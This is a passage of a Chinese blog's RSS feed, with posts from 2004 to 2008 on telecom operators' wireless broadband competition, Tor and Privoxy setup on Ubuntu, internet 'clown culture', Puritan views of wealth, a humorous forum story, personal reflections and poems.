的特质受到青睐。如果说以前还受限于网络覆盖等因素而有种种不足，那么随着３Ｇ网络的大规模建设以及无线宽带接入技术的发展，这些问题都将迎刃而解，无线宽带将迎来自己的黄金时代。&#xA;面对这样一个巨大的、迅速升温的市场，重组之后的移动、联通、电信自然谁都不能放过。因为以前无线宽带更多是作为电信有线宽带的延伸，所以当移动、联通携着他们在无线移动领域的优势打入这个市场，给人的第一感觉便是——他们断了电信的后路、抢了电信的地盘，而实际上，全业务时代的全业务竞争在所难免，无论移动、联通想进入宽带领域还是电信要进入移动领域，无线宽带都是很好的一个切入点，需要的是三家各自找准自己的优势所在，走差异化路线。&#xA;移动、联通、电信竞跑无线宽带市场&#xA;对应无线宽带以及移动宽带兴起的是“无线城市”，自2004年美国费城率先提出“无线费城计划”以来，这股无线风暴迅速席卷全美并进而风靡全球。有数据显示，目前全球在建和规划中的“无线城市”已经超过1000个，有关机构预计：到2010年“无线城市”将增加至1500个。而国内也已有近30个城市提出要建设“无线城市”，除了中部地区的武汉，主要集中在长三角、珠三角和环渤海等经济发达地区。&#xA;2008年3月底，投资近1亿、覆盖面积接近100平方公里的北京无线城市一期工程悄然完工，并在奥运前夕的6月25日开始免费试运营；5月15日，上海嘉定区一期工程宣告竣工；8月至10月，无线宽带城域网覆盖率高达80%的杭州“无线数字城市”试运行启动……&#xA;在这样的热潮中，中国电信已在南方21省做了大量Wi-Fi部署，CDMA+ WiFi的“C+W”计划也一直孕育中。中国联通和中国移动也在一些地区开展无线城市建设，如中国移动在厦门、上海、天津已经部署了不少热点，厦门更是成为首个TD-SCDMA无线城市。&#xA;直面全业务竞争时代&#xA;电信重组在给三大运营商提供了全业务竞争机遇的同时，也带来挑战。中移动入手固网欠缺一些天时，中电信入手移动网络少一些地利，中联通则需要调理好联通+网通的人和。&#xA;在这场变革中，中国移动自身没有太大变化，但TD网是当前商用成熟性最低的，有运营风险，而固网投入成本大，回报期长，在固网宽带领域一时想插足也不容易。中国电信终于拿到了盼望多年的移动业务运营权，但也为C网付出高额代价，成本压力不低，终端瓶颈制约很大，在运营自己并不熟悉的移动业务的同时还要面对固网用户流失的压力，如何既保住老业务，又发展新业务，是个问题。中联通算是这次重组中的强强联手，但也正因此，“人和”方面需要付出更多时间和努力。&#xA;而这次中移动假手TD上网本，正是移动无线宽带战略的进一步延伸，大有抄电信传统宽带市场后路之嫌。在2009年日益激烈化的运营商市场之争中，最终决定发展空间的还是直面用户的业务，对于中国电信而言，要保持传统宽带的势头，而且争夺无线市场的利器是什么？IPTV？天翼189？C+W？还是手机IPTV？近两年，IPTV被电信发展的有声有色，这一业务能否成为其重要筹码，我们拭目以待！（周晓静）</description>
    </item>
    <item>
      <title>一切很好，不缺烦恼</title>
      <link>https://anwangtanmi.github.io/posts/10386b79f7c85ddf2482b710cab44bf6/</link>
      <pubDate>Mon, 04 Aug 2008 17:19:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/10386b79f7c85ddf2482b710cab44bf6/</guid>
      <description> 在什么都没写过的日子里，日子就这样从身边流过，留下或多或少的印记，快乐不快乐已没什么分别。我还是那样晃悠着过，晚睡，晚起，总是在大吃一顿后暗下决心要减肥或者边吃边嚷着减肥，玩的时间比学习的时间多，迷糊发呆的时间比清醒的时间多，自怨自艾内疚自责和自信心膨胀踌躇满志像一根绳子的两股，紧紧拧在一起盘旋交替，好在日子总是向前过的；阳光让我把影子甩在身后，时间是一个筛子，网孔越来越大，晒走一些细小琐碎的东西，让我觉得越来越轻；家人朋友让我在做任何决定时都觉得底气十足，我想我在快乐着自己的简单的快乐。 一开始我写了“一圈过后你甩脱了她的手，以为她终会靠过来，哪知她在独舞，你再也够不到她的手……”这样的文字，为一个朋友，我不得不再次感谢时间，感谢它的一刻不停，感谢它的公平，到这里，我的脑海里只留下这些：相逢一笑，我没有恩仇可以泯，有的只是友善。 </description>
    </item>
    <item>
      <title>TOR: 如何访问http://cpp.winxgui.com/cn:stdext</title>
      <link>https://anwangtanmi.github.io/posts/d8d56f43ae0c5d269f7b4ec4acb9fab7/</link>
      <pubDate>Wed, 30 Jul 2008 11:17:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/d8d56f43ae0c5d269f7b4ec4acb9fab7/</guid>
      <description>为了和谐奥运，我的 wiki：http://www.winxgui.com, http://cpp.winxgui.com/cn:stdext 等暂时不能访问了。一个解决方案是使用TOR。 Linux (Ubuntu)下可以按照如下步骤：&#xA;* sudo apt-get install torbutton-extension tor privoxy&#xA;* sudo vi /etc/privoxy/config 去掉以下这行的注释符’#’（第1054行）：&#xA;forward-socks4a / 127.0.0.1:9050 .&#xA;* sudo /etc/init.d/privoxy restart&#xA;大功告成。</description>
    </item>
    <item>
      <title>新近诗作 – 我在找寻什么</title>
      <link>https://anwangtanmi.github.io/posts/13f4cdf418192293e3c24ad4b8530b90/</link>
      <pubDate>Thu, 20 Sep 2007 02:02:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/13f4cdf418192293e3c24ad4b8530b90/</guid>
      <description>跳动的音乐&#xA;急速拉升的声调&#xA;时而像水一样流动&#xA;忽明忽暗&#xA;我在找寻什么&#xA;幽静&#xA;黑暗的方间&#xA;点火&#xA;烟&#xA;熏了整个空间&#xA;我想要什么&#xA;上网&#xA;无限的网络&#xA;游戏&#xA;一个QQ的叫声&#xA;传来远方的呼吸&#xA;没有距离 /***感觉到距离 触摸神精***/&#xA;什么是生活&#xA;长长的毛布&#xA;箍着我的裸体&#xA;我在听着音乐 忽明忽暗&#xA;夜里一个人&#xA;一个人一个方间&#xA;我在抽着烟 一点亮光&#xA;胜负只在一念&#xA;不进功等于失败&#xA;我在玩着游戏 惊心动魄&#xA;22:11 2007-9-15</description>
    </item>
    <item>
      <title>“丑角”文化的是与非</title>
      <link>https://anwangtanmi.github.io/posts/d8e4fdaa678d34bb8a085a7f8fb5232b/</link>
      <pubDate>Wed, 21 Jun 2006 13:55:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/d8e4fdaa678d34bb8a085a7f8fb5232b/</guid>
      <description>看到一篇文章，把当今窜红网络世界而又不被现实世界接受的各种奇奇怪怪的人物和现象称之为“丑角文化”。说是一种文化现象，乃是抬举了他们的高度。依我看，恐怕连“娱乐”都很勉强。因为无论是文化或娱乐，都应该标榜一个时代的特征，为大众所接受并给予一定的精神营养。至于后来拿“美国的孔庆祥”和“中国的红衣教主黄薪”命运不同来说中美文化差异，说他们成了牺牲品，暗里批判我们的社会潮流没有美国人的那种宽容（原语：“…遭到互联网骂客的群殴，却又缺乏足够坚硬的心理铠甲，结果只能发布“下野”宣言，黯然神伤地退出表演舞台，成为丑角时代的牺牲品。与她命运相似的还有“中产兰”等。她们都是骂客的猎杀对象，最终倒在了文化猎场的尽头。而那些仍在苦苦挣扎的丑角，也已经在骂客的声讨下左支右绌，眼角里闪烁出哀怜的泪光。….骂客成为中国哄客的主流，正是中国文化躯体发生癌变的征兆。”）。&#xA;作者把热衷于在BBS或博客中发表评论的读者也即那些捧红“丑角”的人称为“哄客”，而根据他们对丑角的不同态度大致分为三种：赞客、笑客和骂客。赞客先不说，对于“丑角”，除了一些幼稚园的小儿可能是找不到几个了。美国人笑客多，中国人骂客多，这是不争的事实。但我觉得不应该据此就推论出“中国文化躯体发生癌变”了，要评论一种现象，尤其是附带上整个社会，任何的说辞都应该谨而又慎。就这件事，首先要看问题的本身，即“丑角”是否应该被骂，如果丑角在舞台上作各种恶心的表演而还报以掌声，这无异于鲁迅先生《呐喊》里出现的那一幕；仅表演还则罢了，而如果表演本身具有很强的模仿性，而表演者自身并非她表演的那种风格（比如“芙蓉姐姐”），明知是不可取的行为却为了哗众取宠而搬上屏幕，难道还要让我们的“骂客们”默许吗？第二，美国人的宽容是与之社会的公开性和包容性分不开的。美国是移民国家，各种思潮兼容并收，可以说对于每一种观念都找不出绝对的支持者和绝对的反对者，这样的一种环境，聪明的美国人当然不会天天去取笑和漫骂街上看不惯的行为，多数时候他们都是一笑了之，中国则不同，几千年的儒家文化长期占据领袖地位，大多数的中国人都是热衷于长统的富教式生活，偶尔蹦出个异类来，人们的口吻多数是一致的批评，这其实跟人们的胸怀无关。要说宽容和仇恨，其实中国人是最容易忘记仇恨的，而关于“丑角”，本是他们给社会带来的负面作用，骂一骂使他们清醒是绝对应当的。&#xA;丑角，实在是太不像话了。因为网络的流行，使许多中国人成名的心理产生的不应有的激进。在现实社会中坚持正面思想做出惊人成绩太难，于是，不知天高地厚的年轻人就冒险地采用逆向思维，不惜损毁自身名誉也不顾他人利益，只要能够窜红，说多恶心的话做多难看的事都在所不惜。他们或东施效颦、或特立独行、或危言耸听、或对他人作人身攻击，总之无所不用其极，只要能聚集大众的目光，不管是好的坏的都会使劲。最后闹得个“宣布下野”的立场实在是大快人心所谓众望所归的！现在社会，收入、分配及其不公，于是就有很多人来趟这浑水，企望在这“丑角经济”中分得一杯羹，企望在这里沾湿了鞋以后“走路”就能轻便许多。归根结底，丑角会出现，是社会浮华造成的，怒骂丑角，是在斧正那些有点思想而蠢蠢欲动的年轻人，应该提倡而不是批判。</description>
    </item>
    <item>
      <title>看帖不回帖的后果！！（转）</title>
      <link>https://anwangtanmi.github.io/posts/c6d102dba39240235dd254bc501f4463/</link>
      <pubDate>Thu, 22 Dec 2005 18:56:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/c6d102dba39240235dd254bc501f4463/</guid>
      <description>那是一个阴冷的日子，天暗暗的，暗的让人感到不安。&#xA;曾经我不明白为什么不安。&#xA;但是，我现在明白了。&#xA;那是因为我多行不义必自毙。&#xA;老天爷也有预感的！&#xA;那天，&#xA;偶正在公司偷偷上网，突然头上一声霹雳炸响：“你在干什么？”&#xA;“我、我、在网上查资料……”我来不及关掉页面，战战兢兢的站起来，颤抖着声音答道。&#xA;老板劈头盖脸的训道：“少给我来这套！上班时间给我专心点，再让我查到你上网我炒了你！”&#xA;训完，老板转身欲走。&#xA;我悬得高高的小心肝正要归位，&#xA;突然老板折了回来，径直坐到我的电脑面前。&#xA;然后，我看到老板的脸色渐渐的如死猪一样，开始涨红，发青，发黑，甚至开始发臭。&#xA;老板霍地站起来，悲愤的声音在整个公司的上空回荡：&#xA;“你丫竟然看贴不回贴？！”&#xA;“你怎么能够看贴不回贴？！”&#xA;鱿鱼，鱿鱼……我终于尝到味道了……&#xA;被炒了鱿鱼的偶悲伤地在街上晃荡，一直到天渐渐的黑下来，偶还不知道往何处去。&#xA;漫无目的地晃荡到某处，抬头一看，&#xA;*，“任你上”网吧。&#xA;门口一个比蛊惑仔还要蛊惑的的美女对我抛个媚眼，于是偶就晕乎乎地飘了进去……&#xA;网吧里的人真多，偶拣了仅剩的一个位置坐下，&#xA;打开一个BBS继续看偶今天在公司没看完的鬼故事，看完，顺手关掉了网页。&#xA;接着,&#xA;偶看见屏幕上映出一个发抖的身影，正站在偶的背后。&#xA;一种诡异的即将爆炸的感觉在我的周围弥漫开来。&#xA;我回头，刚开始殷勤无比的美女一手端着一杯饮料，一手指着我，&#xA;极力压抑着的愤怒使得她浑身不停地发着抖。&#xA;我不知道我做错了什么让她这样的愤怒。&#xA;“你走！出去！我们网吧没有你这种看贴不回贴的家伙！”&#xA;这是我今天听到的第二声炸雷了。&#xA;再接着，偶能感到网吧里的人站了一个起来，又站了一个起来，再站了一个人起来……&#xA;所有的目光齐刷刷地聚集在我的身上，我开始感到一种万箭穿心的痛楚。&#xA;然后，无数火山爆发般充满力量和杀伤力的拳头朝我的身上头上落了下来……&#xA;我不知道自己昏迷了多久，我只知道我醒来后鲜血淋漓地躺在一条臭水沟边上.</description>
    </item>
    <item>
      <title>赚取财富</title>
      <link>https://anwangtanmi.github.io/posts/d905808747ac91f75f7abcc794dd4b46/</link>
      <pubDate>Mon, 10 Jan 2005 21:56:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/d905808747ac91f75f7abcc794dd4b46/</guid>
      <description>赚取财富 -一篇让你震惊得解释 财富这东西近来成为公众关注的焦点。10月12日，英国人胡润推出了2004年度中国内地富豪榜，35岁的国美电器老板黄光裕以105亿元人民币的身价荣登榜首，31岁的上海盛大网络创始人陈天桥以88亿元人民币身价、62岁的中信泰富集团掌门人荣智健以85亿元人民币身价分列二三 位。我们一边谈着中国富豪们的财富增长速度，一边暗里思谋着如何让自己的财富也增多些。那么，经理人该遵循什么样的财富观呢？或许，这原本就没有绝对的答案。 几乎所有的社会学家、文明学者都公认清教徒精神是美国多次引领世界产业革命先河、兴旺产业背后的根本动力，也是美国企业永存创业激清，最先迎接工业革命及计算机、互联网信息产业浪潮的精神与信仰原因。 在价值观多元化的社会里，也许我们没必要都认同这些观点，但对清教徒精神对商业的作用，尤其是财富观、创业精神的探讨，可为中国企业家所借鉴。&#xA;拼命的挣钱&#xA;清教徒认为，人是上天财富的管家，使财富增值是企业所有成员的天职。如果老板出于信任，拨一笔资金让你经营一个项目，你首先不能使公司亏本，必须让自己创造出高于启动资金十几倍的财富出来，你才算尽到了自己的天职。如果你没有使投资增值，亏了本或者保持了原样，那么，你就是一个“又恶又懒的”、没有尽职的人。 在清教徒看来，财富也是造物主交托的代管物，人必须履行好自己管家的职责；人的一切不属于自己，只是替上天管理、保管、使用并分配这些财物。财富增加也不是为了自己，而是荣耀上天。任何加增财富的行为，都有了神圣的意义。 管家的观念，也是清教徒能够竭尽一生、永不停息地赚取财富的思想指南。如果为了自己吃喝玩乐，赚到一定程度就有可能停止，因为个人一生的消费和花费是非常有限的。如果是为他人做管家来赚取财富，就不再是满足自己的需要，而是为了不断地增值，以求主人的悦纳，这样一种赚取财富的精神动力就是持续不止、永不停息的。正是这种精神动力，才使清教徒中涌现出众多伟大的企业家，涌现出不断使财富增值的企业家精神。 在法律和道德范围内，将赚取财富作为神圣的天职，将不断使财富增值作为神圣的使命和职责。只有这样，才能有持续不断的激情去创造财富、扩大资本。创造财富是任何一家在市场中生存发展的公司的根本目标。创造不断增大的财富，是公司老板和所有员工最大也是最为一致的目标。 在清教徒企业家看来，赚钱是人本身的目的，是人生中要持续不断进行的事业，而且一直要赚到死的那一天，至少在企业家心目中，他们伦理观念的核心就是赚取财富，正是这种观念，为企业家的生活方式提供了伦理基础和正当理由。 所以，清教徒精神就是一种典型的企业家精神。有了这种精神，才能够永葆创业精神，才能够作大做强，才能真正履行一个企业家的职责和使命，才能尽到企业家的天职。&#xA;拼命地省钱 清教徒认为：任何无节制的人生享乐、纵情狂欢，都会驱使人舍弃职守、堕落贫穷。&#xA;永葆创业精神，我们就必须学习清教徒的伦理理念，根除纵欲的一切观念和行为，而且要正确对待享乐和消费。享乐与工作一样都很费时，所以时间的分配往往成为工作与享乐间的张力，而且在享乐之前，一定要算计一下所要花费的时间和金钱成本。 按照清教徒的看法，金钱是用来增值而不是用来消费的，穷奢极欲、大肆挥霍违背天理、令人厌恶；只有节制有度、积累资本和扩大业务，才是造物主称许的善举。但省钱的本身不是目的，省钱不是不花钱，而是把省下来的钱用在投资上。省钱的最终目的是扩大利润。 在清教徒的理念中，要对日常生活的费用尽量节俭，但节俭完全不同于吝啬，因为正是由于节俭才能使一个人在该大方的时候大方，在该出手投资的时候出手。清教徒将在生活上节省下来的资金用在经营上、用在投资上。而在经营活动当中，他们也把资金用在最能产生利润的流程和部门中，而对因管理设施和成本产生的费用严格控制。他们只在乎结果，不在乎形式，他们只在乎利润，不在乎公司自身是否有排场。 具有创业精神的公司必须具有类似清教徒精神的企业文化，这是一种排斥华丽辞藻、繁琐浪费、人浮于事等种种形式主义的企业文化，这是一种将节俭和削减成本放在重中之重的企业文化。&#xA;拼命地捐钱 “拼命地挣钱，拼命地省钱，拼命地捐钱”，在这句作为清教徒精神真实写照的话语中，最后一句的意义非常巨大。没有最后一句，清教徒精神就不能构成一个整体。虽然我们必须要以赚取财富为天职，但在牟利这个人生目的的背后，有着更高的、终极的人生目的，这就是对人类、对他人、对世界的爱。没有了爱，赚取财富就与永恒无法联系起来；没有了爱，经营活动就成了功利性的、最终虚无的行为；没有了爱，我们每个人的人心就得不到最终的安顿。惟有爱，使我们的经济活动和每天的工作充满了意义，使我们的弁利活动和赚取财富得到了永恒之光的关照。 在当今美国，饶有趣味的是财富排行榜与慈善排行榜几乎一致，那些名列前茅的世界顶级富豪们，也就是世界上顶尖的大慈善家。世界首富比尔·盖茨在2003年就立下遗嘱，给孩子只留下3000万美金和价值一亿美元的豪宅，而将98%的财产奉献给社会。世界第二富豪巴菲特也将其99%的财产捐献给贫困学生的奖学金、疾病医疗、环境保护等各种社会公益的研究基金等。美国的富人由于基督信仰的缘故，给世人都留下了成功、慷慨、充满爱心的美好形象。&#xA;人的一生需要一个总的终极关怀，如果仅仅是买房、买车等阶段性的目标，那人生的意义就只是物质层次而已，谈不上获得永恒的意义。财富只能解决人的现实物质问题，而当这些问题解决后，人必须找到高于物质财富的更高意义，找到自己生命的终极意义。即使在追求财富的过程中，也要清醒地认识到，自己所有活动的终极目的并非仅仅是物质利益。这也是人能够再进一步发展的根源，是一个企业家永续创业动力，一个企业成员永葆创业精神的根基.</description>
    </item>
    <item>
      <title>打铁：给我正身处其中的这一年——2004年</title>
      <link>https://anwangtanmi.github.io/posts/22bdaa30d5e7023402f32bd2ec9d668e/</link>
      <pubDate>Thu, 23 Sep 2004 19:28:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/22bdaa30d5e7023402f32bd2ec9d668e/</guid>
      <description>打铁：给我正身处其中的这一年——2004年 打铁，打铁&#xA;给2004年的阳光，给我正身处其中这一年的树&#xA;给一些种子，也给我的母亲&#xA;一些人往前走&#xA;一些人往后走&#xA;一些人坐在地上看着天&#xA;这将是怎样的一年&#xA;打铁人停下来&#xA;天空就忽明忽暗&#xA;打铁，打铁&#xA;给2004年的土地，给我正身处其中这一年的书籍&#xA;给一些普通日子，也给我的果子&#xA;一些人写书&#xA;一些人读书&#xA;一些人睁大眼睛看着网络&#xA;这将是怎样的一年&#xA;打铁人停下来&#xA;天空就忽明忽暗&#xA;一个卖柴人横渡入市，&#xA;返回已是黄昏。&#xA;快看，快看&#xA;这将是怎样的一年&#xA;打铁人一停下来&#xA;天空就忽明忽暗。&#xA;Jplateau 2004年1月29日星期四 写于精博</description>
    </item>
  </channel>
</rss>
